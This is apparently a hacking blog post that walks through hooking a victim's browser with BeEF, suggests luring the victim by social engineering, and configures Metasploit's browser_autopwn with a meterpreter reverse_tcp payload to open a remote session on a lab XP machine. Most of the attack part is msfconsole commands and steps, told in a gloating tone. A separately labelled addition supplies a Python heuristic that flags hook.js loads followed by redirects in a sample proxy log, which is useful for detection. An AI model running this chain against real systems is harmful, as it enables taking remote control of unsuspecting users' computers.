Exploit Combo Beef It
In this post I'll try to combine BeEF and Metasploit to create an attack. BeEF, the Browser Exploitation Framework, is a great tool to exploit an XSS vulnerability on a site. My target for the attack is still my XP SP3 machine. Let's get started.. >:)
- First, start your BeEF-ng services on our BackTrack. The address is
- OK, next is to send a link containing the hook.js file to the victim. Let's say that, using social engineering or another technique like fake email or spoofing, I was able to make my victim visit the malicious link. I will just use the demo site provided by BeEF.
- After the victim visits the link, it will appear in the "hooked browsers" section of the BeEF control panel.
- We will use auxiliary/server/browser_autopwn to attack our victim. Set up msfconsole as follows.
    msf > use auxiliary/server/browser_autopwn
    msf auxiliary(browser_autopwn) > set LHOST 192.168.56.1
    msf auxiliary(browser_autopwn) > set PAYLOAD_WIN32 windows/meterpreter/reverse_tcp
    PAYLOAD_WIN32 => windows/meterpreter/reverse_tcp
    PAYLOAD_JAVA
- Type 'exploit' to start the browser_autopwn server. Wait until it has finished loading all the exploits.
- We must redirect the victim's browser to the address where the Metasploit browser_autopwn is waiting. In my case it will be 192.168.56.1:8080/JuwbJrk
- Back in the BeEF control panel, go to commands>browser>site redirect
- Execute..
- A meterpreter session is opened.. :D
- To see the list of opened sessions, type "sessions -l"
- Owned.. >:D Combo exploitation successful.. Still have to train my attack vector though, this is not enough.. :)
"the quieter you become, the more you are able to hear.."
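
On the defending side, the sequence in this walkthrough (a browser loads hook.js, then gets sent to a random-looking path on another port of the same host) leaves a trail in web proxy logs. The following is an added example, not part of the original post: the log format, the client addresses, port 3000, the demo page path and the 30-minute window are assumptions, and the heuristic is illustrative only.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample proxy log (timestamp, client, method, URL). The
# 192.168.56.1:8080/JuwbJrk URL is the one from the post; the client
# addresses, port 3000 and the other URLs are assumptions for illustration.
SAMPLE_LOG = """\
2012-02-20T10:00:01 192.168.56.101 GET http://192.168.56.1:3000/demos/basic.html
2012-02-20T10:00:02 192.168.56.101 GET http://192.168.56.1:3000/hook.js
2012-02-20T10:00:05 192.168.56.102 GET http://intranet.example/index.html
2012-02-20T10:03:10 192.168.56.101 GET http://192.168.56.1:8080/JuwbJrk
2012-02-20T10:04:00 192.168.56.102 GET http://192.168.56.1:8080/JuwbJrk
"""

WINDOW = timedelta(minutes=30)  # how long a hook.js sighting stays relevant
RANDOM_PATH = re.compile(r"^/[A-Za-z0-9]{4,16}$")  # one random-looking segment


def find_hook_then_redirect(log_text):
    """Return (client, hook_url, landing_url) for each client that loaded a
    hook.js script and was later sent to the same host on another port."""
    hooks = {}  # client -> (time, hostname, port, url) of its last hook.js fetch
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        stamp, client, _method, url = parts
        when = datetime.fromisoformat(stamp)
        u = urlsplit(url)
        if u.path.rsplit("/", 1)[-1].lower() == "hook.js":
            hooks[client] = (when, u.hostname, u.port, url)
            continue
        seen = hooks.get(client)
        if (seen and when - seen[0] <= WINDOW and u.hostname == seen[1]
                and u.port != seen[2] and RANDOM_PATH.match(u.path)):
            findings.append((client, seen[3], url))
    return findings


if __name__ == "__main__":
    for client, hook, landing in find_hook_then_redirect(SAMPLE_LOG):
        print(f"{client}: loaded {hook}, then visited {landing}")
```

Only the client that fetched hook.js first is reported; the second client hits the same landing URL without a prior hook and is left for other detections.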